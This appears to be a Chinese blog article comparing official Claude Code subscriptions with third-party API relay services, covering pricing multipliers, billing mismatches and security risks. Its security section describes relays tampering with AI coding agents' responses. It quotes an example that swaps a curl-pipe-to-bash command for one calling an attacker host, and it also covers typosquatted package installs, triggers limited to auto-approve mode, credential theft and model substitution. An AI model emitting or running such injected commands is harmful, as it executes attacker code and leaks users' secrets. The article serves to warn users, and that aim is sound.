← 返回文章列表

Claude Code 官方订阅 vs 中转站

Claude CodeAI

Claude Code 官方订阅 vs 中转站


一、什么是中转站?什么是 CC 官方订阅?

Claude Code 与 API 的关系

Claude Code(简称 CC)是 Anthropic 推出的终端编码代理。它调用 Claude 模型执行代码编写、调试、重构等任务,每一次交互都会消耗 token。

使用 Claude Code 有两条路径:

  • 官方订阅:在 Anthropic 官网购买 Pro / Max 计划,通过官方服务器直连模型
  • API 接入:通过 Anthropic API 或第三方转发服务(即”中转站”)接入模型

什么是中转站

中转站是一种第三方中间商服务。它在你和 Anthropic(或 AWS Bedrock 等模型托管平台)之间充当转发代理:接收你的请求,转发给上游模型提供商,再把响应返回给你。

中转站存在的原因:

  • 国内用户无法直接访问 Anthropic 官网或支付美元
  • 官方 API 按量计费价格高昂
  • 官方 Max 订阅存在支付门槛和封号风险

绝大多数中转站的计费后台基于开源项目 One-API(30.5K GitHub stars,119 万 Docker pulls)及其分支 new-api(25.4K stars,125 万 Docker pulls),提供统一的额度管理和模型路由能力。

CC 官方订阅档位

Anthropic 官方对额度的描述含糊不清(“5 小时内约 50-200 个提示”),但通过逆向工程(详见第五章)已经完整破解了真实额度:

套餐月价5h Credit 限额周 Credit 限额缓存策略
Pro$20(≈¥144)550,000(1×)5,000,000(1×)5min 缓存写入
Max 5×$100(≈¥720)3,300,000(41,666,700(8.33×1h 缓存写入
Max 20×$200(≈¥1,440)11,000,000(20×)83,333,300(16.67×1h 缓存写入

注意两个被官方隐藏的事实:

  • Max 5× 的周限是 Pro 的 8.33 倍(不是名义上的 5 倍)——5× 是性价比甜点
  • Max 20× 的周限只有 Pro 的 16.67 倍(不是 20 倍)——20× 的边际收益递减

所有订阅计划共享一个关键特性:CacheRead 完全免费。这是理解后续所有成本分析的核心前提。


二、中转站的渠道来源与各渠道的问题

你在中转站买的每一个”刀”,背后可能是完全不同的货源。目前市面上的 Claude Code 中转渠道主要有 五类,每一类的技术架构、风险和实际体验差异巨大。

1. 逆向渠道(kior、反重力等)

原理:从 Antigravity、Cursor 等第三方客户端中逆向提取 API 接口,封装成 OpenAI 兼容格式出售。

技术架构:后台维护一个逆向出来的 API key 池。你每次请求被随机分配到池中某个 key 上轮询。

致命问题

  • 提示词污染:逆向出来的 API 携带源平台自身的系统提示词(比如反重力的专属 prompt),这些 prompt 会混入你的上下文,直接造成降智
  • 缓存为零:key 池轮询意味着你的下一个请求几乎不可能路由回上一个 key。Claude 的缓存机制要求同一个 key 的连续请求才能命中缓存——轮询直接打碎了这个前提
  • 双重亏损:没有缓存 = 所有 token 按新建计费(成本翻倍)+ 模型丢失上下文缓存(思考不连贯 = 降智)

逆向渠道是所有渠道里最差的:你付的钱买到了更贵的账单和更蠢的模型。

2. AWS Bedrock / Azure / GCP 多对多(key 池模式)

原理:商家在 AWS Bedrock 等云平台上部署 Anthropic 官方模型,申请多个 IAM 账号的 API key,组成 key 池对外出售。

技术架构:你的请求在多个 AWS API key 之间轮询,每个 key 对应一个独立的模型实例。

优点:模型本身是 Anthropic 官方正品,支持 1M 上下文、1h 缓存。智力水平不降智。

致命问题

  • 缓存命中率极低:和逆向渠道同理——key 池轮询导致你的请求无法稳定路由到同一个 key,缓存几乎建立不起来
  • 标价便宜但实际消耗高:标价 0.1-0.3 元/刀看似极低,但因为没有缓存,所有 token 都按 fresh input + cache write 计费,实际单次请求成本远高于有缓存的方案

这类渠道的本质矛盾:模型没问题,但架构决定了缓存用不上——最贵的那部分成本(缓存写入)你每次都要重新付。

3. AWS Bedrock 一对一(专属模型)

原理:商家部署一个专属模型实例,分配固定 API key 给你的团队使用。所有请求路由到同一个模型。

技术架构:一对一绑定,等同于你自己在 AWS 上开了一个 Bedrock 实例。

优点:完整缓存、满血智力、1M 上下文、1h 缓存。体验与官方 API 无异。

致命问题

  • 价格昂贵:按 Anthropic API 官方定价计费。经过渠道折扣后,普通用户到手约 3.5 元/刀,企业大户谈到极限约 1 元/刀
  • 本质上就是 API:你付的是 API 价格,和 Max 订阅的「缓存读免费」优势完全无关

这是体验最好但最贵的中转渠道。但既然都花这个钱了,为什么不直接订 Max?

4. Max 号池 / sub2api 中转站

原理:商家批量开 Max 订阅账号,通过 sub2api 或 CRS(claude-relay-service)反代成 OpenAI 兼容 API,按号池轮询对外出售。

技术架构:后台几十到几百个 Max 账号组成号池。sub2api 按 API 定价算法对每个用户计量额度。

致命问题

  • 计费算法错位:sub2api 默认使用 API 定价算法(CacheRead 收费 $0.5/M token),但 Max 账号的真实消耗使用官方算法(CacheRead 免费)。同样的使用量,sub2api 后台显示的消耗是官方真实消耗的 2-8 倍
  • 缓存不稳定:号池的号额度用光就轮换。换号 = 缓存消失 = 下一个请求全部重新写入。即使商家算法优化做得好(尽量保持同一用户 session 在同一账号),也无法保证 1 小时内不换号
  • 封号风险传导:sub2api 的 TLS 握手指纹与 Claude Code 原生不一样,Anthropic 技术上可以识别。2026 年 3 月严打后翻车率激增
  • 超卖套利空间大:因为 API 刀 ≈ 2-4 倍官方刀,车头按 API 刀算限额、按官方刀用实际额度,中间的差额就是利润——四人车可以按八人卖

sub2api 中转站赚的就是「两种刀之间的汇率差」。行规心照不宣,没人有动机戳破。

5. OpenRouter / ZenMux 等聚合平台

原理:聚合多家模型提供商,提供统一 API 接口。背后可能是自部署模型或直接转发。

现状:缓存表现和定价取决于具体实现,缺乏透明度。中国用户使用时常经过多层代理链路。

这类平台的核心问题是不透明:你不知道请求实际经过了几跳,每一跳都是一个潜在的安全和成本风险点。


三、中转站的倍率体系与计价陷阱

中转站的价格页面上写满了”倍率""汇率""分组”这些术语。这套体系源自 One-API 的统一换算框架,把不同价格的模型全部折算到一个内部额度单位中。

核心基准$1 额度 = 500,000 基准 Tokens(以早期模型 davinci-002 的 $2/1M tokens 定价为基准)。

你需要知道的五个概念

术语含义对你的影响
充值汇率你花多少人民币换 1 美元站内额度连接你的钱包和站内额度的桥梁
模型倍率中转站给某模型设定的输入价 ÷ 2.00决定基础单价。倍率越高,模型越贵
补全倍率模型输出价 ÷ 输入价决定额度消耗速度。AI 生成回答通常比输入贵,Opus 的补全倍率是 5
分组倍率你所在用户组的额外乘数最容易被忽略的隐藏加价。“高速官转”组可能是 2×,默认组是 1×
官方标准模型倍率官方输入价 ÷ 2.00(黄金标尺)衡量中转站定价是否公道的基准线

核心公式

官方标准模型倍率(用来当标尺):

官方标准模型倍率 = 官方模型输入价格 ($/1M tokens) ÷ 2.00

主要模型的官方标准倍率速查:

模型官方输入价 ($/1M)官方标准模型倍率
claude-3-haiku$0.250.125
claude-3.5-sonnet$3.001.5
claude-3-opus$15.007.5
gpt-4o-mini$0.150.075
gpt-4o$5.002.5
gemini-1.5-pro$3.501.75

中转站实际价格(终极公式):

                    中转站设定的模型倍率
实际价格(元) = ─────────────────────── × 分组倍率 × 充值汇率
                    官方标准模型倍率

这个公式的含义是:为了获得官方 $1 等效的服务,你在这家中转站实际需要支付多少人民币。

额度扣费公式(你的余额是怎么被扣的):

                 分组倍率 × 模型倍率 × (输入Token数 + 输出Token数 × 补全倍率)
扣除额度($) = ────────────────────────────────────────────────────────────────
                                       500,000

实例演算:一家中转站到底贵不贵?

以一家虚构的”FakeAI”中转站为例:

已知条件:
├── 充值汇率 = 1(1 元人民币 = 1 美元站内额度)
├── 目标模型:gpt-4o-mini
├── 中转站将 gpt-4o-mini 输入价定为 $0.60/1M tokens
│   → 中转站模型倍率 = 0.60 ÷ 2.00 = 0.3
├── 分组:"高速官转",分组倍率 = 2
└── 官方 gpt-4o-mini 输入价 $0.15/1M
    → 官方标准模型倍率 = 0.15 ÷ 2.00 = 0.075

代入终极公式:
实际价格 = (0.3 ÷ 0.075) × 2 × 1 = 4 × 2 × 1 = 8.00 元

结论:在 OpenAI 官网花 1 美元(≈7.3 元)就能用的 gpt-4o-mini,在这家中转站要花 8 元人民币。这是一个溢价渠道

同样的方法算 Claude Opus:

某中转站 claude-3-opus 设定:
├── 中转站输入价 $18/1M → 模型倍率 = 18 ÷ 2 = 9
├── 官方标准模型倍率 = 15 ÷ 2 = 7.5
├── 分组倍率 = 1.5("稳定渠道"组)
├── 充值汇率 = 6.67(充 100 元 = 15 美元额度)

实际价格 = (9 ÷ 7.5) × 1.5 × 6.67 = 1.2 × 1.5 × 6.67 = 12.0 元

官方 $1 ≈ 7.3 元,这家中转站要 12 元,溢价 64%

三步速判法:3 分钟看穿任何中转站

第一步:找到三个数字

  1. 充值汇率是多少?(充 100 元给 15 美元额度 → 汇率 = 100÷15 ≈ 6.67)
  2. 你常用模型的模型倍率是多少?(若网站只标美元价格 → 倍率 = 输入价 ÷ 2)
  3. 你的账户分组倍率是多少?(若无特殊说明,默认 1)

第二步:查官方标准模型倍率(见上表)

第三步:代入公式,和实时汇率(约 7.3 元/美元)比较

实际价格 = (中转站模型倍率 ÷ 官方标准模型倍率) × 分组倍率 × 充值汇率
  • 实际价格 < 7.3:折扣渠道,数字越小越划算
  • 实际价格 ≈ 7.3:价格公道,与官方成本持平
  • 实际价格 > 7.3:溢价渠道,你在为中转/稳定/特殊功能额外付费

常见的三个「猫腻」

猫腻一:模型倍率虚高

中转站自行设定模型倍率,不受约束。官方 Opus 标准倍率 7.5,中转站设成 9 甚至 12——你在价格页面看不出来,因为页面可能只显示”Opus: $18/1M”,不会告诉你官方只要 $15/1M。

猫腻二:分组倍率隐藏加价

这是最容易被忽略的暗坑。很多中转站按用户等级设置不同分组:免费组 1×,普通组 1.5×,“高速官转”组 2×。你看到的模型倍率一模一样,但实际扣费翻了 1.5-2 倍。务必确认自己账户是否被放进了高分组倍率的用户组。

猫腻三:低汇率 + 高倍率的组合拳

极低的充值汇率(如 1:1)往往伴随着极高的模型倍率。你被低汇率吸引充了钱,但模型倍率设成官方的 2-4 倍——综合下来比 1:7 汇率 + 标准倍率还贵。永远不要只看充值汇率,必须三个数字一起算。

某中转站声称”1:1 官方价”,为什么算出来还是更贵?检查三个点:① 模型倍率是否大幅高于官方 ② 你是否被放进了高分组倍率的用户组 ③ 充值汇率是否高于市场实时汇率。三者任意一个偏高,实际成本都会上升。


四、计费算法到底怎么算?数字说话

上一章分析的是中转站倍率体系对「标价」的加价。本章分析的是一个更隐蔽的问题——中转站和官方用的根本不是同一套计费算法,同样的使用量算出来的消耗可以差 2-8 倍。

定义:市面上存在三种「刀」

同一个”刀”字,背后是完全不同的计算公式:

API 刀(sub2api / ccusage / Cursor 使用):
  费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0.5

CC 官方刀 Max(Max 5×/20× 的真实消耗):
  费用 = Input×$5 + Output×$25 + CacheWrite×$10 + CacheRead×$0(免费)

CC 官方刀 Pro(Pro $20 的真实消耗):
  费用 = Input×$5 + Output×$25 + CacheWrite×$6.25 + CacheRead×$0(免费)

核心差异就一个:CacheRead 是否收费。

Max 的 CacheWrite 单价更高($10 vs $6.25,因为 Max 是 1h 缓存,Pro 是 5min 缓存),但 CacheRead 完全免费。API 算法的 CacheWrite 便宜但 CacheRead 收 $0.5/M token。

CacheRead 占比有多大?

这是决定两种刀汇率差的关键参数。实测编码场景下:

一天真实用量分布(500K 上下文):
├── Input        ≈   3,894 tokens(<1%)  ← 你打的那几个字
├── Output       ≈ 117,481 tokens(~1%)
├── CacheWrite   ≈  14M tokens  (~29%)
└── CacheRead    ≈ 472M tokens  (~70%) ← 这块官方免费,API 收钱

用这组真实数据,分别按两种算法计算同一天的消耗:

官方刀算法:
  3894×$5/M + 117481×$25/M + 14M×$10/M + 472M×$0/M
  = $0.02 + $2.94 + $140 + $0
  = $143

API 刀算法:
  3894×$5/M + 117481×$25/M + 14M×$6.25/M + 472M×$0.5/M
  = $0.02 + $2.94 + $87.5 + $236
  = $326

同一天、同样的使用量:官方算 $143,API 算 $326。汇率 1:2.28。

这还只是 500K 上下文。上下文越大,CacheRead 占比越高,汇率差越大:

平均上下文CacheRead 占比API 刀 : 官方刀
250K~60%1 : 2
500K~70%1 : 4
1M~85%1 : 8

不手动 /compact/clear 的话,8 小时连续编码上下文就能涨到 500K,两天到 1M。上下文越大,中转站的「汇率税」越重。

这个汇率差怎么验证?

只有按官方刀算法得到的金额 ÷ 5h 限额 $82.5(Max 5× 的单窗口美元等效),算出的百分比才能和 Claude Code 内 /usage 显示的百分比对齐。

如果按 API 刀算,得到的百分比是 /usage2-3 倍——一个人一天就能”用掉”三人车的全部官方额度,这在逻辑上不可能。

有用户实测:oauth 直连 20× 三人车,自己一天 sub2api 后台显示 $326,但三个人加起来的 5h×3 官方总额也才 $246。API 刀的数字是虚高的。

sub2api 拼车中车头的四种算法策略

这直接决定你作为乘客实际拿到多少额度:

车头策略乘客算法车头自留后果
A. 良心车头官方刀(CacheRead 免费)公平分配不浪费,公平
B. 不知情车头API 刀 + 按官方总额分配浪费归零浪费高达 50% 额度,但车头也不知道
C. 精明车头API 刀 + 自留差额40%+ 归车头四人车车头实际拿到近一半额度
D. 超卖车头API 刀 + 超卖人数利润翻倍四人车按八人卖,乘客不知道车里几个人

大多数车头处于 B 或 C 的状态。 A 需要车头主动修改 sub2api 的计费算法设置,但 sub2api 默认就是 API 算法。D 是行业潜规则——乘客无法验证车内实际人数。

「为什么没人说这个秘密?」——中转站老板知道但没有动机戳破,因为赚的就是两种刀之间的汇率差。

倍率陷阱 + 两种刀 = 双重加价

第三章的倍率体系和本章的「两种刀」问题是叠加关系

你实际支付的钱
  = 倍率体系的加价(模型倍率 × 分组倍率 × 充值汇率)
  × 两种刀的汇率差(CacheRead 收费导致的 2-8 倍膨胀)

以一个「看似公道」的中转站为例:

倍率体系:实际价格 = 8.5 元(溢价 16%,看起来还行?)
两种刀加价:500K 上下文 → API 刀是官方刀的 4 倍
综合成本:8.5 × 4 = 34 元 ≈ 等效 $4.7

而 Max 5× 的官方等效:0.34 元/刀 × 7.3 = 2.5 元 ≈ $0.34

实际贵了 13.8 倍。

五、CC 官方订阅的真实额度和性价比

Credit 系统逆向

安全研究者 she-llac 通过抓包 Claude SSE 响应中未四舍五入的 usage_ratio 浮点数(如 0.16327272727272726),利用 Stern-Brocot 树恢复精确分数,再对大量请求做控制变量实验,完整破解了 Claude 的 Credit 计费体系。

Credit 换算公式

credits_used = input_tokens × R_in + output_tokens × R_out

各模型费率(credits/token):
           Input        Output
Haiku:     2/15         10/15
Sonnet:    6/15         30/15
Opus:      10/15        50/15

三大规律:
  Output = Input × 5(所有模型)
  Opus = Haiku × 5
  Sonnet = Haiku × 3

统一换算:7.5 美元 = 1M Credits

订阅 vs API 的价值对比

套餐月 Credits月等效 API $订阅价性价比倍数
Pro $2021.7M$163$208.1×
Max 5× $100180.6M$1,354$10013.5×
Max 20× $200361.1M$2,708$20013.5×

以上为无缓存下界。加入缓存后,因为 CacheRead 免费,价值进一步飙升:

场景订阅 CreditsAPI 等效 $Max 5× 周容量月等效 $倍数
冷缓存(100K 写 + 1K 出)70,000$0.65595 次/周$1,67616.8×
热缓存(100K 读 + 1K 写 + 1K 出)4,000$0.0810,416 次/周$3,66736.7×

热缓存场景下,$100 订阅拿到 $3,667 的 API 等效价值——超过 36 倍。

真实采购价推导

按实测一周编码记录(CacheRead 命中 83%):

无缓存基准 = ¥720 ÷ ($1,354 ÷ ¥7.2/刀) = 0.53 元/刀
缓存命中 83% → 加成系数 1.558 → 实际 = 0.53 ÷ 1.558 = 0.34 元/刀

Max 5× 的等效采购价:0.34 元/刀。 这是后续所有对比的基准线。


六、中转站的安全风险

以上分析的全是经济账。但中转站的风险远不止多花钱——你的代码、密钥和对话内容正面临三类完全不同的安全威胁。

6.1 技术层面:载荷注入与凭据窃取(UCSB 实证)

UCSB(加州大学圣塔芭芭拉分校)在 2026 年 4 月发表的学术论文(arxiv:2604.08407)首次系统性量化了 LLM 中转路由器的安全风险。

研究规模:28 个付费路由器(淘宝/闲鱼/Shopify)+ 400 个免费路由器(sub2api/new-api 模板)。

行为付费(28 个)免费(400 个)
主动注入恶意代码18
自适应规避(前 N 次正常,之后注入)02
窃取 AWS 凭据017
盗取 ETH 私钥01

四类攻击手段

  1. 载荷注入:把模型返回的 curl https://正常.sh | bash 替换为 curl https://攻击者.sh | bash。修改后仍是合法 JSON,不触发任何异常
  2. 依赖投毒:把 pip install requests 替换为 pip install reqeusts(typosquat),绕过域名白名单
  3. 条件触发:前 50 次请求表现正常,只在 YOLO 模式 + Rust/Go 项目时注入——你的烟雾测试永远测不出来
  4. 被动窃取:扫描流量中的 API key、AWS key、GitHub Token、ETH 私钥,异步泄露但不改响应——你完全无感

蜜罐实验:研究者部署弱配置蜜罐后被自动纳入中转链路——4 万次未授权访问,20 亿 tokens 流量(~13 GB 明文),99 个凭据泄露跨 440 个 Codex 会话,其中 401 个处于 YOLO 自动批准模式

跨框架测试:Claude Code、Codex、OpenCode、OpenClaw —— 0/4 实现了响应完整性校验。载荷注入兼容率 100%。

供应链最弱链:你 → 淘宝卖家 → 二级聚合商 → OpenRouter → 模型主机。每一跳终止并重建 TLS,每一跳拥有明文读写权。只要链中任一节点恶意,整条链路的完整性即被破坏。

6.2 产业链层面:黑卡、退款流与”三头吃”

中转站背后的产业链远比你想象的复杂。来自多位站长和行业内部人士的公开信息揭示了完整的利润链条:

号源的四种来源

来源成本说明
黑卡盗刷近零利用支付验证漏洞批量注册,封号后申请退款,成本趋近于零
逆向反代破解 Kiro/Cursor/Antigravity 的内部接口,把客户端订阅额度转卖
云厂商 Credit 灰色流转AWS/Azure/GCP 发给初创公司的算力额度被违规倒卖
企业折扣协议合法正规,但利润最薄

“三头吃”盈利模式——一些中转站同时从三个方向赚钱:

  1. 第一头:收你的充值费用
  2. 第二头:用批量注册的账号白嫖额度,封号后退款——等于用官方的钱来服务你
  3. 第三头:你的所有输入输出都是明文,打包卖给需要训练数据的买家

有站长公开表示收到了数据购买请求但拒绝了——他拒绝了,不代表别人也拒绝。

跑路生命周期:低价+送额度吸引用户 → 规模大了涨价降稳定性 → 群里吐槽就封号踢人 → 某天域名消失,余额归零。

6.3 模型注水:你用的可能不是 Opus

界面显示 claude-opus-4,后台跑的可能是 gpt-5.4 甚至某个 7B 开源模型。这就是业内所说的”换头术”。

注水的经济动机:圈内 gpt-5.4 成本约 4 分/次,ccmax Opus 成本要 1 块 5——中间差了 几十倍。有的中转站十次注 1-2 次水,用户很难察觉。

学术实证(CISPA 亥姆霍兹信息安全中心,arxiv:2603.01919):

  • 被测 24 个 API 端点中,超过半数在后台换了模型
  • 用假模型每花 $1,错误数量是官方 API 的 2-4 倍
  • 187 篇学术论文在用这些假 API 跑实验,其中 62% 已被 ACL/CVPR 等顶会接收

SLA 承诺的真相(来自站长公开发言):

  • “市面上敢承诺 SLA 的全都是注水大户”——风控一提高账号成片死,不标红的基本都是逆向渠道
  • 所有号称能”网页检测满血 CC”的工具全是智商税——只查几个 tools 字段和特定返回值,逆向渠道可以完美伪装
  • 有大佬可以把 kiro/gpt-5.4 完美伪装成 ccmax 通过市面上所有的网页检测手段

唯一相对可靠的注水检测方法:拿中转返回的思考块签名,提交到官方 ccmax 进行验证。逆向渠道的签名不会被官方认证,直接返回报错。

6.4 数据风险:你是付费客户,也是免费的训练数据

所有经过中转的请求——完整的 prompt + response——就是一份现成的蒸馏数据。

尤其是 Claude Code 这类编程场景,用户产出的全是复杂推理链和真实的工程决策,对模型厂商来说是梦寐以求的蒸馏素材。

“中转站真正的商业模式很可能是:收你中转费是表面生意,把你的请求数据打包卖给大厂做模型蒸馏,才是核心 margin。”

“有些中转站上线的核心目的根本不是卖 API,而是为了收集特定场景的高质量蒸馏语料。低价只是获客手段。”

已知证据

  • Telegram 上有人向站长出价购买用户数据(截图已公开)
  • V2EX 上有站长承认收到买数据的报价

防护建议

  1. 关键密钥和私钥放到 Agent 不能读取的目录(.gitignore / .claudeignore
  2. 环境变量不要以明文形式出现在代码或提示词中
  3. 使用中转站时,假设所有输入输出都会被永久存储

七、总结:中转站 vs 官方 CC 订阅

维度官方 Max 5×逆向中转Bedrock 多对多Bedrock 一对一sub2api 拼车
标价¥720/月0.5-1 元/刀0.1-0.3 元/刀~1-3.5 元/刀1-1.5 元/刀
计费算法官方刀API 刀API 刀API 刀API 刀
CacheRead免费收费收费收费收费
缓存命中~83%~0%~10%~83%不稳定
实际等效成本0.34 元/刀2-8 元/刀0.8-2.4 元/刀1-3.5 元/刀2-12 元/刀
模型智力满血 Opus降智(污染+无缓存)正常满血波动(可能注水)
注水风险高(本身就是逆向)中(十次注 1-2 次)
数据泄露仅 Anthropic 可见明文可被存储/售卖明文可被存储明文可被存储明文可被存储/售卖
倍率加价不透明不透明相对透明不透明
代码安全端到端直连极高(注入+窃取)
上下文200K→1M取决于源1M1M200K→1M

中转站的真实成本由三层加价叠加,外加三层安全风险:

经济成本 = 倍率加价(模型倍率 × 分组倍率 × 充值汇率)
         × 算法加价(CacheRead 收费导致的 2-8 倍膨胀)

安全成本 = 载荷注入风险(代码被篡改执行)
         + 数据泄露风险(对话被存储、售卖、用于蒸馏)
         + 模型注水风险(用低价模型冒充 Opus)

而 Max 5× 只有一个数字:0.34 元/刀——满血智力、完整缓存、端到端直连、零安全风险、零数据泄露。

所有中转渠道的实际等效成本都应该和 0.34 元/刀比较,而不是和标价比较。